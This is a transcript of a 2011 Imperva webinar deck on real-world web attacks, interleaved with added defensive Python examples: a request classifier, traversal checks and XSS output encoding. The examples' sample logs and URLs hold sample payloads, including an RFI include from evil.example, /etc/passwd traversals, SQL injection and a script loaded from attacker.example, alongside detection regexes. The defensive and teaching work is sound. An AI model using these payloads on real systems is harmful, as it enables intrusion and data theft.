Post on 21-May-2015
The State of Application Security: What Hackers Break
Amichai Shulman, CTO, Imperva
Agenda
The current state of Web vulnerabilities
Studying hackers
+ Why? Prioritizing defenses
+ How? Methodology
Analyzing real-life attack traffic
+ Key findings
+ Take-aways
Technical recommendations
Imperva Overview
Imperva’s mission is simple: Protect the data that drives business
The leader in a new category: Data Security
HQ in Redwood Shores CA; Global Presence
+ Installed in 50+ Countries
1,200+ direct customers; 25,000+ cloud users
+ 3 of the top 5 US banks
+ 3 of the top 10 financial services firms
+ 3 of the top 5 Telecoms
+ 2 of the top 5 food & drug stores
+ 3 of the top 5 specialty retailers
+ Hundreds of small and medium businesses
Today’s Presenter
Amichai Shulman – CTO Imperva
Speaker at industry events
+ RSA, Sybase Techwave, Info Security UK, Black Hat
Lecturer on Info Security
+ Technion - Israel Institute of Technology
Former security consultant to banks and financial services firms
Leads the Application Defense Center (ADC)
+ Discovered over 20 commercial application vulnerabilities
– Credited by Oracle, MS-SQL, IBM and others
Named one of InfoWorld’s “Top 25 CTOs”
WhiteHat Security Top Ten 2010 (chart): percentage likelihood of a website having at least one vulnerability, sorted by class
The Situation Today
# of websites (estimated: July 2011): 357,292,065
× 1% × 230 ≈ 821,771,600 vulnerabilities in active circulation
But which will be exploited?
Studying Hackers
Focus on actual threats
+ Focus on what hackers want, helping good guys prioritize
+ Technical insight into hacker activity
+ Business trends of hacker activity
+ Future directions of hacker activity
Eliminate uncertainties
+ Active attack sources
+ Explicit attack vectors
+ Spam content
Devise new defenses based on real data
+ Reduce guess work
Understanding the Threat Landscape: Methodology
Analyze hacker tools and activity
Tap into hacker forums
Record and monitor hacker activity
+ Categorized attacks across 30 applications
+ Monitored TOR traffic
+ Recorded over 10M suspicious requests
+ 6 months: December 2010-May 2011
Lesson #1: Automation is Prevailing
Attacks are automated
+ Botnets
+ Mass SQL Injection attacks
+ Google dorks
Tools and kits exist for everything
On average: 27 attacks per hour ≈ 1 attack per 2 minutes
Apps under automated attack: 25,000 attacks per hour ≈ 7 per second
Take-away: Get ready to fight automation
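The two rates above are easy to tell apart by counting per source in a sliding window. The following is an added example, not Imperva's code: a detector that flags a source once it exceeds a limit within a window. The window (60 s) and limit (60 requests) are assumptions; the 27/hour and ~7/second figures come from the slides, and the IP addresses are documentation ranges.

```python
"""Flag sources whose request rate can only come from a tool or bot.

Added example, not Imperva's code. The 27/hour and ~7/second rates are the
deck's figures; the window size and limit below are assumptions.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 60     # sliding window length (assumed)
LIMIT_PER_WINDOW = 60   # more suspicious requests than this per window = automated (assumed)


class AutomationDetector:
    """Sliding-window counter per source; observe() expects time-ordered events."""

    def __init__(self, window=WINDOW_SECONDS, limit=LIMIT_PER_WINDOW):
        self.window = window
        self.limit = limit
        self.events = defaultdict(deque)  # source -> timestamps still inside the window

    def observe(self, source, ts):
        """Record one suspicious request at time ts (seconds). Return True if the
        source has now exceeded the limit within the window."""
        q = self.events[source]
        q.append(ts)
        while q and ts - q[0] > self.window:   # drop events that fell out of the window
            q.popleft()
        return len(q) > self.limit


def automated_sources(events, window=WINDOW_SECONDS, limit=LIMIT_PER_WINDOW):
    """Replay (source, ts) events in time order and return the sources flagged as automated."""
    det = AutomationDetector(window, limit)
    flagged = set()
    for source, ts in sorted(events, key=lambda e: e[1]):
        if det.observe(source, ts):
            flagged.add(source)
    return flagged


def constructed_events():
    """Constructed sample: a human-paced source at the deck's average of 27
    requests/hour, and a tool at the deck's ~7 requests/second for 30 seconds."""
    events = [("198.51.100.7", i * 3600 / 27) for i in range(27)]
    events += [("203.0.113.9", 600 + i / 7) for i in range(210)]
    return events


if __name__ == "__main__":
    print("automated:", automated_sources(constructed_events()))
```

A source that never exceeds one request per window is never flagged, so the human-paced source stays clean while the tool is flagged about nine seconds into its run. In production the per-source state would live in a shared store and the threshold would be tuned per application.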
Lesson #2: The "Unfab" Four
Lesson #2A: The "Unfab" Four: SQL Injection
Lesson #2B: The "Unfab" Four: Remote File Inclusion
Analyzing the parameters of an RFI attack (the remote URL the request tries to include) and its source enhances common signature-based attack detection.
Lesson #2C: The "Unfab" Four: Directory Traversal
Lesson #2D: The "Unfab" Four: Cross Site Scripting
Lesson #2D: The "Unfab" Four: Cross Site Scripting – Zooming into Search Engine Poisoning
http://HighRankingWebSite+PopularKeywords+XSS
The attacker crafts URLs on a high-ranking site that combine popular search keywords with a reflected XSS payload; once the search engine's next indexing cycle picks them up, users searching for those keywords are sent to the poisoned page.
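What makes the poisoned URL work is the site echoing the search term back unencoded. The following is an added example, not Imperva's code or any real site's handler: a constructed poisoning URL in the shape sketched above (high-ranking host, popular keywords, XSS payload), the vulnerable rendering beside a hardened one that output-encodes the term and marks the dynamic results page noindex. The hostnames and the handler functions are assumptions.

```python
"""Reflected XSS on a search page, the hole that XSS-based search engine
poisoning rides on. Added example, not Imperva's code; the URL, hosts and
handler functions are constructed."""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed poisoning URL in the deck's shape:
# HighRankingWebSite + PopularKeywords + XSS
POISON_URL = (
    "http://highranking.example/search?q=free+concert+tickets+"
    "%3Cscript+src%3D%22http%3A%2F%2Fattacker.example%2Fx.js%22%3E%3C%2Fscript%3E"
)


def query_param(url, name="q"):
    """Decoded value of one query parameter, as the server would see it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(q):
    """Echoes the search term into HTML as-is: the payload becomes live script
    on a page the search engine will happily index under those keywords."""
    return f"<h1>Results for {q}</h1>"


def render_hardened(q):
    """Output-encodes the term so it is displayed rather than executed, and
    marks the dynamic results page noindex so engines do not rank pages whose
    content is attacker-chosen."""
    body = f"<h1>Results for {html.escape(q, quote=True)}</h1>"
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "X-Robots-Tag": "noindex",
    }
    return body, headers


if __name__ == "__main__":
    term = query_param(POISON_URL)
    print("vulnerable:", render_vulnerable(term))
    body, headers = render_hardened(term)
    print("hardened:  ", body, headers)
```

Encoding at output is the fix for the XSS itself; the noindex header addresses the poisoning angle separately, since a search-results page that reflects arbitrary terms has no business being indexed even when it is encoded correctly.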
Lesson #2: The "Unfab" Four
Take-away: Protect against these common attacks
These may seem like obvious, common attacks, but RFI and DT do not even appear in the OWASP Top 10.
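To make the four classes concrete, here is an added example (not Imperva's code, and not the signatures of any product) that classifies requests from access-log lines into SQL injection, RFI, directory traversal and XSS, and pulls out the host serving an RFI payload as the deck's "parameters and source" analysis suggests. The log lines, IP addresses and hostnames are constructed, and the signatures are deliberately small; a real engine needs far broader coverage. It decodes parameter values twice so the double-encoded traversal on the last line is caught.

```python
"""Classify web requests into the four classes the deck calls the "Unfab Four":
SQL injection, remote file inclusion (RFI), directory traversal and XSS.

Added example, not Imperva's code. Log lines, IPs and hosts are constructed;
the signatures are small and illustrative.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx-style access log line (constructed sample further down).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

RULES = [
    # Parameter value is itself a remote URL: the classic RFI shape.
    ("RFI", re.compile(r"^\s*(?:https?|ftp)://", re.I)),
    # A ".." path segment, after decoding, anywhere in the value.
    ("DirectoryTraversal", re.compile(r"(?:^|/)\.\.(?:/|$)")),
    # Tautology, UNION-based and stacked-query fragments, or a trailing comment.
    ("SQLi", re.compile(
        r"'\s*(?:or|and)\s+[^\s=]+\s*=|union\s+(?:all\s+)?select|;\s*drop\s+table|--\s*$", re.I)),
    ("XSS", re.compile(r"<\s*script|javascript:|on(?:error|load|mouseover)\s*=", re.I)),
]


def normalize(value, rounds=2):
    """Percent-decode up to `rounds` times so a double-encoded %252e%252e%252f is
    seen as ../, and fold backslashes so ..\\ is treated like ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def classify_request(target):
    """Return the set of attack classes matched by the path and query values of target."""
    parts = urlsplit(target)
    # parse_qsl already decodes one layer; normalize() handles a second one.
    values = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    found = set()
    for raw in values:
        value = normalize(raw)
        for name, pattern in RULES:
            if pattern.search(value):
                found.add(name)
    return found


def analyze_log(text):
    """Return (ip, target, classes) for every request in the log that matched a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        classes = classify_request(m["target"])
        if classes:
            hits.append((m["ip"], m["target"], classes))
    return hits


def rfi_hosts(hits):
    """Hosts serving RFI payloads: the 'source' side of an RFI attack, which is
    an indicator in its own right beyond the request signature."""
    hosts = set()
    for _, target, classes in hits:
        if "RFI" not in classes:
            continue
        for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if RULES[0][1].search(v):
                hosts.add(urlsplit(v.strip()).hostname)
    return hosts


# Constructed sample log (documentation IPs and hostnames, not real traffic).
LOG_LINES = """\
203.0.113.9 - - [14/Mar/2011:10:02:11 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512
203.0.113.9 - - [14/Mar/2011:10:02:12 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 199
198.51.100.23 - - [14/Mar/2011:10:03:01 +0000] "GET /product?id=1%27%20or%20%271%27%3D%271 HTTP/1.1" 500 88
198.51.100.23 - - [14/Mar/2011:10:03:05 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 3021
192.0.2.44 - - [14/Mar/2011:10:04:00 +0000] "GET /download?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1740
192.0.2.44 - - [14/Mar/2011:10:04:30 +0000] "GET /product?id=42 HTTP/1.1" 200 2210
"""

if __name__ == "__main__":
    hits = analyze_log(LOG_LINES)
    for ip, target, classes in hits:
        print(ip, sorted(classes), target)
    print("RFI payload hosts:", rfi_hosts(hits))
```

Note the fifth line: the server answered 200, which a status-based alert would never see, and a single-decode signature would miss the payload entirely. Feeding the RFI payload host into a block list is the cheap reputation signal the deck has in mind.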
Directory Traversal Missing from OWASP Top 10?
OWASP Rationale:
Directory traversal is covered in the OWASP Top Ten 2010 through the more general case, A4, Insecure Direct Object Reference.
"Insecure Direct Object Reference" is different from "Directory Traversal": in the latter, access is made to a resource that should not have been available through the application to begin with.
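The distinction has a practical consequence for the fix. A traversal defense must keep every request inside the web root, regardless of who is asking; whether the requester is authorized for a file that does exist under the root is the separate IDOR question. The following is an added example, not Imperva's code: a path-containment check that canonicalizes the resolved path (following symlinks and collapsing ..) before comparing it to the root, with a throwaway directory layout constructed to exercise it.

```python
"""Serve files only from inside a web root, so a request can never reach a
resource that was never meant to be exposed through the application.
Added example, not Imperva's code; the directory layout is constructed."""
import tempfile
from pathlib import Path


def safe_join(base_dir, requested):
    """Return the canonical path for `requested` under base_dir, or None if it
    escapes the root (via .., an absolute path, a symlink or a NUL byte)."""
    if "\x00" in requested:          # C-level APIs would truncate at the NUL
        return None
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()   # follows symlinks, collapses ..
    try:
        candidate.relative_to(base)  # raises if candidate is not under base
    except ValueError:
        return None
    return candidate


def demo():
    """Build a throwaway web root containing a symlink that points outside it,
    and report which requests safe_join() would allow."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve()
        base = root / "public"
        (base / "docs").mkdir(parents=True)
        (base / "readme.txt").write_text("public")
        (root / "secret.txt").write_text("not for the web")
        (base / "link").symlink_to(root)   # symlink escaping the root

        def allowed(requested):
            return safe_join(base, requested) is not None

        return {
            "plain": allowed("readme.txt"),
            "dotdot_inside": allowed("docs/../readme.txt"),  # .. that stays inside is fine
            "traversal": allowed("../secret.txt"),
            "absolute": allowed("/etc/passwd"),
            "symlink": allowed("link/secret.txt"),
            "nul": allowed("readme.txt\x00.jpg"),
        }


if __name__ == "__main__":
    for request, ok in demo().items():
        print(f"{request:14s} {'allowed' if ok else 'rejected'}")
```

A string-prefix check on the unresolved path would pass the symlink case; resolving first is what closes it. Rejecting any ".." outright is a stricter policy some servers prefer, but it is not required for safety once containment is checked on the canonical path.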
Remote File Inclusion Missing from OWASP Top 10?
A3, OWASP Top 10 2007 - Malicious File Execution. Removed in the OWASP Top 10 2010.
OWASP Rationale:
REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.
Lesson #3: The U.S. is the Source of Most Attacks
We witnessed 29% of attack events originating from 10 sources.
Take-away: Sort traffic based on reputation
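Because a small number of sources account for a large share of attack events, a reputation lookup applied at request time pays off. The following is an added example, not Imperva's code: a CIDR-based feed lookup, a per-request decision that combines the feed category with the attacks already seen locally from that source, and the "share of events from the top N sources" measurement behind the 29% figure. The feed contents, thresholds and event sample are constructed (documentation IP ranges).

```python
"""Apply source reputation at request time and measure how concentrated attack
traffic is. Added example, not Imperva's code: feed, thresholds and event
sample are constructed from documentation IP ranges."""
import ipaddress
from collections import Counter

# Constructed feed: CIDR prefix -> category. A real deployment loads a vendor
# or community feed and refreshes it on a schedule.
FEED = {
    "203.0.113.0/24": "known_scanner",
    "198.51.100.0/25": "tor_exit",
}
NETS = [(ipaddress.ip_network(cidr), cat) for cidr, cat in FEED.items()]


def reputation(ip):
    """Feed category for ip, or None if no listed prefix contains it."""
    addr = ipaddress.ip_address(ip)
    for net, cat in NETS:
        if addr in net:
            return cat
    return None


def decide(ip, recent_attacks, block_at=20):
    """Per-request action combining the feed category with the count of attacks
    already seen locally from this source (thresholds assumed)."""
    cat = reputation(ip)
    if cat == "known_scanner" or recent_attacks >= block_at:
        return "block"
    if cat == "tor_exit" or recent_attacks > 0:
        return "challenge"   # e.g. CAPTCHA or stricter rules rather than a hard block
    return "allow"


def top_source_share(events, n=10):
    """Fraction of attack events produced by the n busiest sources. The deck
    reports 29% of attack events coming from 10 sources."""
    counts = Counter(ip for ip, _ in events)
    total = sum(counts.values())
    if not total:
        return 0.0
    return sum(c for _, c in counts.most_common(n)) / total


# Constructed attack events: (source ip, attack class).
EVENTS = ([("203.0.113.9", "SQLi")] * 50
          + [("198.51.100.5", "RFI")] * 30
          + [("192.0.2.44", "XSS")] * 20)

if __name__ == "__main__":
    local = Counter(ip for ip, _ in EVENTS)
    for ip in ("203.0.113.9", "198.51.100.5", "192.0.2.44", "192.0.2.1"):
        print(ip, reputation(ip), decide(ip, local[ip]))
    print("top-2 share:", top_source_share(EVENTS, n=2))
```

Tor exits get a challenge rather than a block because legitimate users do come through them; a source with no listing but a local attack history still gets escalated, which is the "share data on attacks" point of the summary applied to your own traffic first.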
Organizations like these funded a $27B security market in 2010… all had major breaches in 2011. What’s wrong?
Threat vs. Spending Market Dislocation
Threats: "In 2010, 76% of all data breached was from servers and applications" [1]
Spending: "Yet well over 90% of the $27 billion spent on security products was on traditional security" [2]
The data theft industry is estimated at $1 trillion annually
Organized crime is responsible for 85% of data breaches [1]
[1] 2011 Data Breach Investigations Report (Verizon RISK Team in conjunction with the US Secret Service & Dutch High Tech Crime Unit)
[2] Worldwide Security Products 2011-2014 Forecast (IDC, February 2011)
Summary
Deploy security solutions that deter automated attacks
Detect known vulnerability attacks
Acquire intelligence on malicious sources and apply it in real time
Participate in a security community and share data on attacks
Summary
"Foreknowledge cannot be gotten from ghosts and spirits, cannot be had by analogy, cannot be found out by calculation. It must be obtained from people, people who know the conditions of the enemy" [1]
[1] Sun Tzu, The Art of War
Imperva: Our Story in 60 Seconds
(Diagram) Usage Audit, Access Control, Rights Management, Attack Protection, Reputation Controls, Virtual Patching
Get LinkedIn to Imperva Data Security Direct for…
Webinar Materials
Post-Webinar Discussions
Answers to Attendee Questions
Webinar Recording Link
Much more…
Questions
- CONFIDENTIAL -
Thank You